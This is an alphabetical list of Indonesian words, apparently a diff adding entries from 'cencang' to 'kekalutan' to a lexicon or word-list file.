+cencang
+cencawan
+cendala
+cendang
+cendawan
+cendekia
+cendekiawan
+cendera
+cenderasa
+cenderawasih
+cenderung
+ceng
+cengeng
+cengengesan
+cengger
+cenggeret
+cengir
+cengis
+cengkal
+cengkaman
+cengkar
+cengkek
+cengkeram
+cengkerama
+cengkeraman
+cengkerik
+cengking
+cengkir
+cengkok
+cengkol
+cengkung
+cengli
+centang
+centeng
+centil
+centong
+centung
+cepak
+cepat
+cepatnya
+ceper
+ceplok
+cepol
+cepu
+cerah
+cerai
+cerakin
+ceramah
+ceranggah
+cerap
+cerapan
+cerat
+cerca
+cercah
+cerdas
+cerdik
+cerek
+cerempung
+cerewet
+cergas
+ceria
+ceriga
+cerita
+ceriwis
+cerlang
+cermat
+cermin
+cerminan
+cerna
+ceroboh
+cerobong
+cerocok
+ceropong
+ceruk
+cerutu
+cespleng
+cetak
+cetakan
+cetek
+ceteng
+ceti
+cetusan
+cewek
+chauvinis
+chauvinistis
+ciap
+ciar
+cibiran
+cicik
+cicilan
+ciduk
+cigak
+cika
+cikal
+cikar
+cikun
+cikutan
+cilap
+cilik
+cina
+cincong
+cinta
+cipta
+ciptaan
+ciri
+cirit
+cita
+citakan
+citra
+ciu
+ciuman
+ciut
+coang
+coba
+cobaan
+cobek
+cocok
+cocor
+codet
+cogah
+cokar
+cokelat
+coket
+colek
+coleng
+coli
+comar
+comberan
+comblang
+comel
+comelan
+compeng
+condong
+congek
+congkak
+congkong
+congor
+conteng
+contoh
+contong
+copet
+copot
+corak
+coreng
+coret
+coretan
+corong
+corot
+cotok
+cuaca
+cuai
+cuak
+cubitan
+cublik
+cubung
+cuca
+cuci
+cucian
+cucu
+cucuk
+cucukan
+cucur
+cucuran
+cuek
+cuil
+cuilan
+cuk
+cuka
+cukai
+cukil
+cukit
+cukong
+cukup
+cukur
+cula
+culas
+culim
+cuma
+cumbu
+cumbuan
+cumi
+cunam
+cundrik
+cunduk
+cungip
+cungkil
+cupet
+cuplikan
+cupu
+cupul
+cura
+curahan
+curai
+curaian
+curam
+curang
+curat
+curi
+curian
+curiga
+cuti
+dacin
+dada
+dadah
+dadu
+daerah
+daftar
+dagang
+dagangan
+dagelan
+daging
+dagu
+dahaga
+dahak
+dahan
+dahi
+dahsyat
+dahulu
+dahuluan
+dai
+daif
+dajal
+dakar
+daki
+dakon
+daksina
+dakwa
+dakwaan
+dakwah
+dakyah
+dalam
+dalaman
+dalang
+dalih
+dalil
+dalu
+dam
+damai
+damar
+damba
+dambaan
+damik
+dampak
+damping
+dampratan
+dampung
+dan
+dana
+danau
+dandanan
+dandang
+dangau
+dangkal
+dansa
+danuh
+dapat
+dapatan
+dapatnya
+dapur
+dara
+darah
+darat
+daratan
+dari
+daripada
+darma
+darmabakti
+darmasiswa
+darmawisata
+darurat
+dasa
+dasar
+dasawarsa
+data
+datang
+datar
+dataran
+datuk
+daulat
+daun
+daur
+dawai
+dawat
+daya
+dayung
+debar
+debat
+debil
+debirokratisasi
+debit
+debitor
+debu
+dedak
+dedal
+dedel
+dedemit
+dedengkot
+dederuk
+dedes
+dedikasi
+deduksi
+defensi
+defensif
+defile
+definisi
+definit
+definitif
+defisit
+deflasi
+deformasi
+degam
+degan
+degap
+degenerasi
+degil
+degradasi
+degub
+deifikasi
+dek
+dekade
+dekadensi
+dekak
+dekap
+dekapan
+dekat
+dekik
+dekil
+deklamasi
+deklarasi
+deklinasi
+dekomposisi
+dekor
+dekorasi
+dekoratif
+dekrit
+delan
+delegasi
+delik
+delima
+delman
+delta
+delusif
+demam
+demang
+demek
+demen
+demi
+demikian
+demobilisasi
+demokrasi
+demokratisasi
+demonstran
+demonstrasi
+demoralisasi
+demosi
+dempak
+dempet
+dempul
+denah
+denai
+denda
+dendam
+dendang
+dendeng
+dengan
+dengar
+dengkang
+dengki
+dengkik
+dengking
+dengkul
+dengkur
+dengung
+dengus
+dentuman
+denyut
+denyutan
+depak
+depakan
+depan
+departemen
+dependen
+dependensi
+deponir
+deportasi
+deposit
+deposito
+depot
+depresi
+depresiasi
+deputi
+dera
+deraan
+deragem
+derai
+derajah
+derajat
+deram
+deras
+derek
+deresi
+deret
+deretan
+derivasi
+derivat
+derma
+dermaga
+dermawan
+deru
+desa
+desah
+desain
+desainer
+desakan
+desalinasi
+deselerasi
+desersi
+desertir
+desing
+desir
+desiran
+desis
+deskripsi
+despot
+despotis
+despotisme
+destar
+destruksi
+destruktif
+desus
+desuskan
+detail
+detak
+deteksi
+detektif
+detensi
+detente
+deteriorasi
+determinan
+determinasi
+detik
+detonasi
+devian
+deviasi
+dewa
+dewakan
+dewan
+dewasa
+dewata
+dewi
+di
+dia
+diabetes
+diagnosis
+diagram
+dialek
+dialog
+diam
+diameter
+diare
+didik
+diferensiasi
+difusi
+digdaya
+digital
+digresi
+dikit
+dikitnya
+dikotomi
+diktat
+diktator
+diktatorial
+dikte
+diktum
+dilema
+dilematis
+dimensi
+din
+dinamika
+dinamis
+dinamit
+dinamo
+dinas
+dinasti
+dinding
+dingin
+dingkit
+dingklang
+dini
+dipan
+dipetuakan
+diploma
+diplomasi
+diplomat
+diplomatis
+direksi
+direktur
+dirgantara
+diri
+dirigen
+disekuilibrium
+diseminasi
+disentri
+disertasi
+disharmoni
+disiden
+disimilaritas
+disinfektan
+disintegrasi
+disiplin
+diskon
+diskredit
+diskrepansi
+diskriminasi
+diskriminatif
+diskusi
+disonansi
+disparitas
+dispensasi
+disposisi
+distingsi
+distingtif
+distorsi
+distribusi
+distributor
+distrik
+divisi
+doa
+doang
+dobel
+dobrak
+dodekagon
+dodol
+dogma
+dogmatis
+doi
+dok
+dokar
+dokter
+doktor
+doktrin
+dokumen
+dokumentasi
+dol
+dolfin
+dom
+domain
+domba
+domestik
+domestikasi
+dominan
+dominasi
+dominion
+domisili
+dompet
+dompleng
+donasi
+donatur
+dondang
+dongak
+dongeng
+dongkak
+dongkel
+dongkol
+dongkrak
+dongok
+donor
+dop
+dorong
+dorongan
+dos
+dosa
+dosen
+dosis
+dot
+doyan
+draf
+dragon
+drainase
+drama
+dramatikus
+dramatis
+dramatisasi
+drastis
+draw
+dril
+drop
+drum
+dua
+duafa
+duaja
+dualitas
+duane
+dubius
+dubur
+duda
+duduk
+dug
+duga
+dugaan
+dugal
+duhai
+duit
+duka
+dukacita
+duku
+dukuh
+dukun
+dukung
+dukungan
+dulang
+duli
+dungkul
+dungu
+dunia
+duniawi
+dupa
+dupleks
+duplikasi
+duplikat
+durasi
+duren
+durhaka
+duri
+durja
+durjana
+dusta
+dusun
+duta
+duyun
+duyung
+dwibahasa
+ebi
+eceng
+eceran
+edan
+edanan
+edaran
+edisi
+editor
+editorial
+efek
+efektif
+efisien
+efisiensi
+egalisasi
+egaliter
+ego
+egois
+egoisme
+egoistis
+eigendom
+ejaan
+ejakulasi
+ejekan
+eka
+ekaristi
+ekologi
+ekonom
+ekonomi
+ekonomis
+ekopariwisata
+ekor
+eks
+eksak
+eksakta
+eksekutif
+eksekutor
+eksemplar
+eksentrik
+ekses
+eksesif
+ekshibisi
+eksistensi
+eksklusif
+eksodus
+eksotis
+ekspansi
+ekspedisi
+ekspeditor
+eksperimen
+eksplisit
+eksploitasi
+eksplorasi
+eksponen
+ekspose
+ekspres
+ekspresi
+ekstensi
+ekstensif
+eksterior
+ekstra
+ekstrak
+ekstrem
+ekstremis
+ekuator
+ekuilibrium
+ekuivalen
+elaborasi
+elang
+elastis
+elastisitas
+elegan
+elektrik
+elemen
+elementer
+elevator
+eliminasi
+elips
+elite
+elitis
+elok
+elukan
+elus
+elusan
+emak
+emansipasi
+emas
+embacang
+embah
+embak
+embargo
+ember
+emblem
+embrio
+embun
+embung
+emergensi
+emosi
+emosional
+empang
+empat
+empati
+emper
+emperelokkan
+empu
+empuk
+empunya
+emulasi
+enak
+enam
+enas
+enau
+encer
+encok
+endap
+endapan
+endemi
+endutan
+energi
+energik
+engah
+enggan
+engkau
+engku
+engsel
+enkulturasi
+ensiklopedis
+entah
+enteritis
+entri
+enumerasi
+enyah
+epidemi
+epidermis
+epigon
+epigraf
+epik
+epilepsi
+epilog
+episode
+epos
+era
+erang
+erat
+ercis
+erosi
+erot
+erotis
+erti
+eru
+es
+esa
+esai
+esensi
+esensial
+eskalasi
+eskalator
+eskan
+esok
+estafet
+estetis
+etape
+etiket
+etis
+etnis
+etnologi
+eufemisme
+eulogi
+evakuasi
+evaluasi
+evaporasi
+evolusi
+faali
+fabel
+fabula
+faedah
+fail
+fajar
+fakir
+faksi
+fakta
+faktor
+faktual
+falsafah
+famili
+fana
+fanatik
+fanatisme
+fantasi
+fantastis
+fardu
+farik
+faring
+farmakolog
+farmakologi
+fasad
+fase
+fasia
+fasid
+fasih
+fasik
+fasilitas
+fasilitator
+fatah
+fatal
+fatamorgana
+fatanah
+fatinah
+fatsun
+fatwa
+fauna
+favorit
+federasi
+feminin
+fenomena
+fenomenal
+feodal
+feodalisme
+feri
+fermen
+fermentasi
+fertil
+fertilisasi
+fertilitas
+feses
+festival
+fiber
+fibrasi
+figur
+figuran
+figuratif
+fiksi
+fiktif
+filamen
+filantropi
+filial
+film
+filsafat
+filsuf
+filter
+filtrasi
+final
+finansial
+finis
+firasat
+firdaus
+firdausi
+firma
+firman
+fisibel
+fisik
+fisiognomi
+fisiologi
+fiskal
+fit
+fitnah
+fitrah
+fitur
+flat
+flek
+fleksibel
+fleksibilitas
+fleksor
+flora
+flos
+fluensi
+fluida
+fluktuasi
+fluktuatif
+fokus
+folder
+fon
+fondasi
+fonem
+fonetik
+fonologi
+forensik
+forklif
+formal
+formalitas
+formasi
+format
+formatur
+formula
+formulasi
+formulir
+forte
+fortifikasi
+forum
+foto
+fotografer
+fotokopi
+fotometer
+fotosintesis
+foya
+fragmen
+fraksi
+frekuensi
+front
+frontal
+frustasi
+fundamen
+fundamental
+fungsi
+fungsionaris
+furnitur
+fusi
+futur
+gabah
+gabung
+gabungan
+gabus
+gada
+gadai
+gading
+gadis
+gado
+gaduh
+gadung
+gadungan
+gaet
+gagah
+gagak
+gagal
+gagang
+gagap
+gagasan
+gagu
+gahara
+gaharu
+gaib
+gairah
+gajah
+gajahan
+gaji
+gajian
+gajih
+gajus
+gakang
+gala
+galagasi
+galah
+galak
+galakan
+galaksi
+galang
+galangan
+galas
+galat
+galau
+galengan
+gali
+galian
+galur
+gamal
+gamam
+gamang
+gambar
+gambaran
+gambas
+gambir
+gamelan
+gamet
+gamis
+gamit
+gamitan
+gampang
+gamparan
+gamping
+ganas
+gancang
+ganda
+gandar
+gandasuli
+gandeng
+gandik
+gandul
+gandum
+gang
+ganggang
+ganggu
+gangguan
+ganglion
+ganjal
+ganjalan
+ganjen
+ganjil
+ganjing
+ganjling
+ganteng
+ganti
+gantung
+gantungan
+ganyong
+gaok
+gapai
+gaplek
+gaplokan
+gapura
+gara
+garai
+garam
+garang
+garansi
+garasi
+garba
+garda
+gardu
+garing
+garis
+garisan
+garit
+garong
+garpu
+garuk
+garut
+gas
+gasal
+gasolin
+gastronomi
+gatal
+gatra
+gaul
+gaun
+gaung
+gawai
+gawang
+gawat
+gawir
+gaya
+gayanya
+gayung
+gayutan
+gazebo
+gebu
+gebyar
+gede
+gedebok
+gedek
+gedombak
+gedubang
+gedung
+gegabah
+gegana
+gegar
+gegares
+gegep
+geger
+gejala
+gejolak
+geladak
+gelagapan
+gelagat
+gelagatnya
+gelandangan
+gelang
+gelanggang
+gelap
+gelar
+gelas
+geledek
+gelegar
+gelegata
+gelema
+gelembung
+gelendong
+geli
+gelimbir
+gelinding
+gelindingan
+gelintir
+gelisah
+gelitik
+gelitikan
+geliut
+gelobak
+gelombang
+gelora
+geluduk
+gelung
+gema
+gemar
+gemas
+gembel
+gembil
+gembira
+gemblengan
+gembok
+gembong
+gembor
+gembrot
+gembung
+gembur
+gemerlap
+gemetar
+gemilang
+gemini
+gemintang
+gempa
+gempal
+gempar
+gempil
+gempita
+gempor
+gempuran
+gemuk
+gemulai
+gemuruh
+genangan
+genap
+gencar
+gencat
+gencatan
+gencet
+gendak
+gendang
+gender
+genderang
+gendut
+generalisasi
+generasi
+generator
+geng
+genggam
+genggaman
+gengsi
+genit
+genital
+genjang
+genjik
+genjot
+genjring
+genre
+genta
+gentar
+gentas
+gentayangan
+genting
+gentong
+genus
+geodesi
+geografi
+geologi
+geometri
+gepeng
+gepokan
+gerabah
+geragap
+geragot
+gerah
+geraham
+gerai
+gerak
+gerakan
+geram
+gerangan
+geranggang
+gerbang
+gerbong
+gereja
+gerek
+geremet
+gerendel
+gerenjeng
+gerenyau
+gerenyot
+gerepes
+geret
+geretan
+gergaji
+gergajul
+gerhana
+gerigi
+gerik
+gerimis
+gerinda
+gering
+geringgingan
+geripis
+gerlap
+gerlip
+germo
+gerobak
+gerogol
+gerohok
+gerojokan
+gerombolan
+gersang
+gertak
+gertakan
+geru
+geruit
+gerundel
+gerunjulan
+gerus
+gerutu
+gesa
+gesakan
+gesit
+gesper
+gestur
+getah
+getar
+getaran
+getas
+getek
+getir
+getok
+giat
+gigi
+gigih
+gigit
+gigolo
+gila
+gilaan
+gilap
+gili
+gilir
+giliran
+gimnastik
+gincu
+ginding
+gini
+ginjal
+ginseng
+girang
+girik
+giring
+gita
+gitapati
+gitar
+giwang
+gizi
+glamor
+glandula
+glegekan
+glikogenesis
+glikosuria
+global
+globalisasi
+globe
+globus
+glosari
+glositas
+glositis
+glotal
+goblok
+gocek
+godaan
+godam
+godek
+godot
+gohok
+gol
+golok
+golong
+golongan
+gombak
+gombal
+gombang
+gompal
+gondok
+gondrong
+gong
+gongseng
+goni
+gonjong
+gonore
+gontai
+gopoh
+gorden
+goreng
+gores
+goresan
+gorila
+gorong
+gosip
+gosok
+gosong
+got
+gotrok
+gowok
+goyah
+goyang
+goyangan
+gradasi
+gradual
+graf
+grafik
+grafika
+grafikawan
+grafis
+grafit
+grafolog
+grafologi
+grahita
+gramatika
+granat
+granit
+granula
+grapyak
+grasi
+gratis
+gravel
+graver
+gravitasi
+gregetan
+grempel
+gres
+griya
+grogi
+gros
+grosir
+grup
+gruwung
+gua
+guam
+gubahan
+gubal
+gubang
+gubuk
+guci
+gudang
+gudi
+gugatan
+gugup
+gugur
+gugus
+gugusan
+gula
+gulam
+gulana
+gulingkan
+gulita
+gulung
+gulungan
+gumam
+gumpa
+gumpalan
+gumuk
+guna
+guncang
+guncangan
+gundah
+gundik
+gundu
+gunduk
+gundukan
+gundul
+gunjing
+gunjingan
+gunting
+guntingan
+guntur
+gunung
+gurat
+gurau
+gurauan
+gurdi
+guri
+gurih
+gurinda
+gurita
+guru
+guruh
+gurun
+gusar
+gusti
+guyon
+guyub
+habib
+habis
+habisan
+habisnya
+habitat
+habituasi
+hablur
+had
+hadap
+hadapan
+hadiah
+hadir
+hadirat
+hadirin
+hadis
+hafal
+hafalan
+haid
+hajar
+hajat
+hajatan
+haji
+hak
+hakikat
+hakiki
+hakim
+hal
+halaman
+halangan
+halimunan
+halte
+halter
+haluan
+halus
+halusinasi
+hama
+hamba
+hambar
+hambatan
+hamburan
+hamil
+hampa
+hamparan
+hampir
+hampiran
+hancur
+handai
+handuk
+hangat
+hangit
+hangus
+hanjuang
+hantam
+hantaman
+hantar
+hantu
+hanya
+hanyut
+hapus
+hara
+haram
+harap
+harapan
+hardik
+hardikan
+harfiah
+harga
+hari
+harian
+harimau
+haring
+harkat
+harmoni
+harmonis
+harmonisasi
+harmonium
+harta
+hartawan
+haru
+harum
+harus
+hasil
+hasrat
+hasta
+hati
+hatian
+haus
+hayat
+hebat
+heboh
+hela
+helai
+hemat
+hembus
+hempas
+hendak
+hendaklah
+hendaknya
+hengkang
+hening
+henti
+hepatitis
+heptagon
+heptahedron
+heran
+herbivor
+heregistrasi
+hermaprodit
+hermetis
+hernia
+heterogen
+hewan
+hiasan
+hibah
+hibiskus
+hiburan
+hidangan
+hidung
+hidup
+hierarki
+hijau
+hikayat
+hikmah
+hilal
+hilang
+hilir
+himen
+himne
+himpit
+himpunan
+hina
+hingar
+hingga
+hinggap
+hipermetropia
+hipertensi
+hipokrit
+hipopotamus
+hipotesis
+hirau
+hiruk
+hisab
+histeria
+histeris
+histologi
+histori
+historikus
+hitam
+hitung
+hitungan
+hobi
+hoki
+homogen
+homogenitas
+honorarium
+horizon
+horizontal
+hormat
+horor
+hostel
+hostes
+hotel
+hubung
+hubungan
+hujan
+hujat
+hukum
+hukuman
+hulu
+hulubalang
+huma
+humiditas
+humor
+humus
+hunian
+hunus
+huruf
+hut
+hutan
+huyung
+i
+ia
+ialah
+iba
+ibadat
+iban
+ibarat
+iblis
+ibnu
+ibra
+ibrani
+ibtidaiah
+ibu
+ibun
+ibunda
+idam
+idaman
+idas
+ide
+ideal
+idealis
+identifikasi
+identik
+identitas
+ideologi
+idiom
+idiosinkrasi
+idiosinkratis
+idiot
+idola
+iduladha
+idulfitri
+ifah
+iftitah
+iga
+igau
+igauan
+ihram
+ihtimal
+ihwal
+ii
+ijab
+ijabat
+ijazah
+ijil
+ijmal
+ijuk
+ikab
+ikal
+ikan
+ikat
+ikatan
+ikhlas
+ikhtiar
+ikhtisar
+ikhwan
+iklan
+iklim
+ikon
+ikonografi
+ikram
+ikrar
+iktibar
+iktidal
+iktifak
+iktikad
+iktiologi
+iktirad
+ikut
+ikutan
+ilahiah
+ilat
+ilegal
+iler
+iles
+ilham
+ilian
+ilmiah
+ilmu
+ilmuwan
+iluminasi
+ilusi
+ilusif
+ilusionis
+ilustrasi
+ilustratif
+imaji
+imajinasi
+imajinatif
+imajiner
+imam
+iman
+imani
+imbal
+imbalan
+imbang
+imbangan
+imbas
+imbesil
+imbuh
+imbuhan
+iming
+imingi
+imitasi
+imitator
+imla
+impak
+impas
+impase
+imperialis
+imperialisme
+imperium
+impetus
+impi
+impian
+impit
+impitan
+implementasi
+implikasi
+implisit
+importasi
+importir
+impoten
+impresario
+impresi
+impresif
+impuls
+impulsif
+imtihan
+imun
+imunisasi
+imunitas
+imut
+inai
+inang
+inaugurasi
+incar
+incaran
+inci
+incit
+incut
+indah
+indang
+indehoi
+indekos
+indeks
+independen
+independensi
+indigenos
+indik
+indikasi
+indikatif
+indikator
+inding
+indisiplin
+individu
+individual
+individualis
+individualistis
+individualitas
+indo
+indoktrinasi
+indolen
+indolensi
+indra
+indraloka
+induk
+indung
+indusemen
+industri
+industriawan
+inefisien
+inefisiensi
+inersia
+infak
+infantil
+infeksi
+inferensi
+inferior
+inferioritas
+infertil
+infertilitas
+infiks
+infiltran
+infiltrasi
+infinit
+influensa
+informal
+informan
+informasi
+infrastruktur
+inga
+ingat
+ingatan
+inggung
+ingin
+ingkah
+ingkar
+ingus
+ingusan
+inheren
+inhibisi
+inisiasi
+inisiatif
+inisiator
+injak
+injakan
+injap
+injeksi
+inkarnasi
+inklusif
+inkognito
+inkompatibel
+inkompatibilitas
+inkompetensi
+inkonsisten
+inkonsistensi
+inkonvensional
+inkorporasi
+inkubasi
+inovasi
+insaf
+insan
+insanan
+insang
+insani
+insekta
+insektisida
+insektologi
+inseminasi
+insentif
+inset
+insiden
+insidental
+insinuasi
+insinye
+inskripsi
+inspeksi
+inspektur
+inspirasi
+instabilitas
+instansi
+insting
+instingtif
+institusi
+instruksi
+instruktur
+instrumen
+insubordinat
+intan
+integral
+integrasi
+integritas
+intelek
+intelektual
+inteligen
+inteligensia
+intelijen
+intens
+intensi
+intensif
+intensitas
+interaksi
+interelasi
+interes
+interesan
+interferensi
+interinsuler
+interior
+interjeksi
+interkontinental
+interlokusi
+interlokutor
+intermezo
+intern
+internal
+internasional
+interniran
+internis
+interogasi
+interogator
+interpolasi
+interpretasi
+interupsi
+interval
+intervensi
+interviu
+inti
+intiha
+intikad
+intim
+intimidasi
+intipati
+intisari
+intoksikasi
+intonasi
+intrik
+intrinsik
+introduksi
+introspeksi
+intrusi
+intuisi
+intuitif
+invalid
+invasi
+invensi
+inventarisasi
+inventif
+inventivitas
+inventor
+inventori
+inversi
+investasi
+investigasi
+investigatif
+investor
+invitasi
+iodin
+ipar
+ipuh
+ira
+iradiasi
+irama
+iri
+irigasi
+iringan
+iris
+irisan
+irit
+iritasi
+irsyad
+isak
+isbat
+iseng
+isi
+isian
+isit
+isolasi
+istal
+istana
+istiadat
+istilah
+istimewa
+istinggar
+istirahat
+istri
+isu
+isyarat
+italik
+iterasi
+iteratif
+itifak
+itik
+iuran
+iya
+izin
+jabal
+jabar
+jabaran
+jabatan
+jabir
+jabung
+jadah
+jadi
+jadian
+jadinya
+jaduk
+jadwal
+jaga
+jagal
+jagat
+jago
+jagoan
+jagung
+jahanam
+jahat
+jahe
+jahil
+jahiliah
+jahit
+jahitan
+jail
+jajahan
+jajak
+jajan
+jajar
+jajaran
+jaka
+jaksa
+jakun
+jala
+jalal
+jalan
+jalang
+jalar
+jalin
+jalinan
+jalu
+jalur
+jam
+jamah
+jamak
+jamal
+jambak
+jamban
+jambang
+jambar
+jambatan
+jambe
+jambek
+jambiah
+jamblang
+jambon
+jambore
+jambu
+jambul
+jamhur
+jamiah
+jaminan
+jampi
+jampuk
+jamu
+jamuan
+jamur
+janda
+jangak
+jangan
+jangankan
+jangat
+janggal
+jangka
+jangkang
+jangkar
+jangkauan
+jangkit
+jangkungan
+janguk
+janin
+janji
+jantan
+jantung
+jantur
+jarahan
+jarak
+jaran
+jarang
+jari
+jaring
+jaringan
+jarum
+jas
+jasa
+jasad
+jasmani
+jatah
+jati
+jatuh
+jauh
+jawa
+jawab
+jawaban
+jawat
+jawatan
+jawi
+jaya
+jayeng
+jazirah
+jebah
+jebakan
+jebeng
+jeblok
+jeblos
+jebur
+jeda
+jegang
+jegil
+jejal
+jejari
+jejas
+jejer
+jejeran
+jelaga
+jelajah
+jelak
+jelangak
+jelapang
+jelata
+jelatang
+jemaah
+jenazah
+jendela
+jenggot
+jengkelit
+jengkelitan
+jengkit
+jenis
+jenjam
+jenjang
+jenong
+jentik
+jenuh
+jepit
+jepitan
+jepretan
+jera
+jeram
+jerambah
+jerapah
+jerat
+jeri
+jeriji
+jerit
+jernih
+jeroan
+jeruji
+jeruk
+jewer
+jiawang
+jib
+jihat
+jijik
+jika
+jikalau
+jilat
+jilatan
+jilbab
+jilid
+jimat
+jin
+jinak
+jinjing
+jipang
+jiplakan
+jiran
+jirat
+jirus
+jisim
+jitok
+jitu
+jiwa
+jodoh
+joget
+johar
+joki
+joli
+jompo
+jongkok
+jongkong
+jua
+jual
+juang
+juara
+judes
+judi
+judul
+juga
+juita
+juja
+jujur
+jukut
+julai
+juling
+julukan
+juluran
+jumawa
+jumbai
+jumbul
+jumlah
+jumpa
+jumud
+jun
+jungkit
+jungur
+junior
+junjungan
+juntrungan
+juragan
+jurai
+jurang
+juri
+jurnal
+jurnalis
+jurnalisme
+jurnalistik
+juru
+jurusan
+jus
+justifikasi
+justru
+jutawan
+juz
+kabar
+kabel
+kabil
+kabilah
+kabin
+kabinet
+kabir
+kabu
+kabul
+kabung
+kabur
+kabut
+kaca
+kacak
+kacam
+kacamata
+kacang
+kacangan
+kacau
+kacir
+kacu
+kacuk
+kacukan
+kacung
+kadal
+kadam
+kadang
+kadar
+kadarnya
+kadas
+kadaver
+kade
+kader
+kaderisasi
+kadet
+kadi
+kadim
+kado
+kadung
+kafe
+kafi
+kafilah
+kafir
+kagak
+kaget
+kagok
+kagum
+kahar
+kahwa
+kaidah
+kail
+kain
+kais
+kaisar
+kait
+kaitan
+kaji
+kajian
+kakah
+kakak
+kakaktua
+kakang
+kakap
+kakas
+kakawin
+kakbah
+kakek
+kaki
+kaku
+kakuminal
+kakus
+kala
+kalah
+kalam
+kalang
+kalangan
+kalap
+kalar
+kalas
+kalau
+kalaupun
+kalbu
+kalem
+kalender
+kaleng
+kali
+kaliber
+kalimantang
+kalimat
+kaling
+kalis
+kalium
+kalkulasi
+kalong
+kalui
+kalung
+kalut
+kama
+kamar
+kambar
+kambeh
+kambing
+kambuh
+kambut
+kamera
+kamhar
+kami
+kamil
+kamit
+kamitua
+kamp
+kampanye
+kampil
+kampiun
+kampret
+kampung
+kampungan
+kamu
+kamuflase
+kamus
+kan
+kana
+kanak
+kanakan
+kanal
+kanan
+kancah
+kancap
+kanceh
+kancil
+kancing
+kancut
+kandang
+kandas
+kandidat
+kandil
+kandung
+kandungan
+kang
+kangen
+kangkang
+kangmas
+kangsa
+kanji
+kanker
+kano
+kanon
+kanonis
+kanopi
+kans
+kanser
+kanta
+kanti
+kantin
+kantong
+kantor
+kanya
+kanyon
+kaok
+kaos
+kap
+kapa
+kapabel
+kapabilitas
+kapah
+kapak
+kapal
+kapan
+kapang
+kapangan
+kapas
+kapasitas
+kapi
+kapiran
+kapit
+kapita
+kapital
+kapitalisasi
+kapling
+kapok
+kaprah
+kapri
+kaprikornus
+kapstok
+kapten
+kapuk
+kapur
+kara
+karabin
+karakter
+karakterisasi
+karakteristik
+karam
+karang
+karangan
+karas
+karatan
+karau
+karavan
+karawitan
+karbohidrat
+karbol
+karbon
+karbonado
+karbonat
+karbonil
+karcis
+kardia
+kardinal
+kardus
+karena
+karet
+kargo
+karib
+karier
+karih
+karikatur
+karikatural
+karim
+karisma
+karismatis
+karkata
+karnaval
+karpet
+karsa
+kartika
+kartilago
+kartun
+karuan
+karuhun
+karung
+karunia
+karya
+karyatama
+karyawan
+kasah
+kasam
+kasang
+kasap
+kasar
+kasep
+kasidah
+kasih
+kasihan
+kasim
+kasip
+kasir
+kasmaran
+kasta
+kastrasi
+kastroli
+kasturi
+kasur
+kasus
+kata
+katai
+katak
+katalis
+katalog
+katapel
+katebelece
+katedral
+kategori
+kategoris
+kategorisasi
+katek
+katering
+kates
+katib
+katik
+katil
+katir
+katolik
+katrol
+katung
+katup
+kau
+kaukus
+kaul
+kaum
+kaus
+kausa
+kausalitas
+kavaleri
+kawa
+kawah
+kawakan
+kawal
+kawan
+kawanan
+kawasan
+kawat
+kawin
+kawula
+kaya
+kayangan
+kayu
+kayuh
+keabadian
+keabaian
+keabsahan
+keadaan
+keadilan
+keagamaan
+keagungan
+keahlian
+keaiban
+keajaiban
+keakraban
+keaktifan
+keakuan
+keakuran
+kealiman
+kealpaan
+keamanan
+keampuhan
+keandalan
+keanehan
+keanekaan
+keanekaragaman
+keanggotaan
+keanggunan
+keangkuhan
+kearifan
+keaslian
+keasyikan
+kebabaran
+kebablasan
+kebacut
+kebagusan
+kebahagiaan
+kebajikan
+kebal
+kebalikan
+kebangetan
+kebanggaan
+kebangkitan
+kebangkrutan
+kebangsaan
+kebangsawanan
+kebangunan
+kebanyakan
+kebapakan
+kebaruan
+kebat
+kebatinan
+kebebasan
+kebegoan
+kebejatan
+kebekuan
+kebelauan
+kebenaran
+kebencian
+kebendaan
+kebengisan
+kebeningan
+keberadaan
+keberagaman
+keberahian
+keberangkatan
+keberanian
+keberatan
+keberbagaian
+keberhasilan
+keberterimaan
+keberuntungan
+kebesaran
+kebetulan
+kebiadaban
+kebiasaan
+kebijakan
+kebimbangan
+kebinatangan
+kebinekaan
+kebingungan
+kebiri
+kebisingan
+kebisuan
+kebobolan
+kebobrokan
+kebodohan
+kebohongan
+kebolehan
+kebolehjadian
+kebosanan
+kebotakan
+kebrutalan
+kebuasan
+kebudayaan
+kebugaran
+kebulatan
+kebun
+keburu
+keburukan
+kebusukan
+kebut
+kebutuhan
+kecabulan
+kecacatan
+kecakapan
+kecambah
+kecanduan
+kecantikan
+kecap
+kecapekan
+kece
+kecebong
+kecekatan
+kecelakaan
+kecemasan
+kecendekiaan
+kecenderungan
+kecepatan
+kecerdasan
+kecerdikan
+kecergasan
+keceriaan
+kecerlangan
+kecermatan
+kecerobohan
+kecetekan
+kecewa
+kecil
+kecintaan
+kecipir
+kecoak
+kecocokan
+kecoh
+kecolongan
+kecondongan
+kecongkakan
+kecopetan
+kecuaian
+kecuali
+kecundang
+kecupetan
+kecuraman
+kecurangan
+kecurian
+kecurigaan
+kecut
+kedadak
+kedaerahan
+kedahagaan
+kedahsyatan
+kedahuluan
+kedai
+kedaifan
+kedalaman
+kedaluwarsa
+kedamaian
+kedang
+kedap
+kedapatan
+kedatangan
+kedaton
+kedau
+kedaulatan
+kedegilan
+kedegingan
+kedekatan
+kedendaman
+kedengkian
+keder
+kederasan
+kedermawanan
+kedewaan
+kedewasaan
+kediaman
+kedidi
+kediktatoran
+kedinginan
+kedip
+kedipan
+kedodoran
+kedok
+kedokteran
+kedoyanan
+kedudukan
+keduk
+kedukaan
+kedukacitaan
+kedunguan
+keduniaan
+kedurjanaan
+kedustaan
+keefektifan
+keelokan
+keemasan
+keenakan
+keengganan
+keeratan
+keesaan
+kefasihan
+kegagahan
+kegagalan
+kegalauan
+keganasan
+kegarangan
+kegegeran
+kegelapan
+kegelisahan
+kegemaran
+kegembiraan
+kegemilangan
+kegemparan
+kegemukan
+kegentaran
+kegentingan
+kegesitan
+kegetiran
+kegiatan
+kegigihan
+kegilaan
+kegoyahan
+keguguran
+kegunaan
+kegundahan
+kehabisan
+kehakiman
+kehampaan
+kehampiran
+kehancuran
+kehangatan
+kehangitan
+keharmonisan
+keharuman
+kehausan
+kehebatan
+kehebohan
+kehendak
+keheningan
+keheranan
+kehidupan
+kehilangan
+kehomogenan
+kehormatan
+keibuan
+keikhlasan
+keikutsertaan
+keimanan
+keimunan
+keindahan
+keinginan
+keingintahuan
+keinsafan
+keintiman
+keistimewaan
+kejadian
+kejahatan
+kejai
+kejam
+kejamas
+kejang
+kejanggalan
+kejap
+kejar
+kejaran
+kejatuhan
+kejayaan
+kejen
+kejernihan
+keji
+kejiwaan
+kejuaraan
+kejumudan
+kejuruan
+kejut
+kejutan
+kekacauan
+kekaguman
+kekah
+kekaisaran
+kekal
+kekalahan
+kekalutan
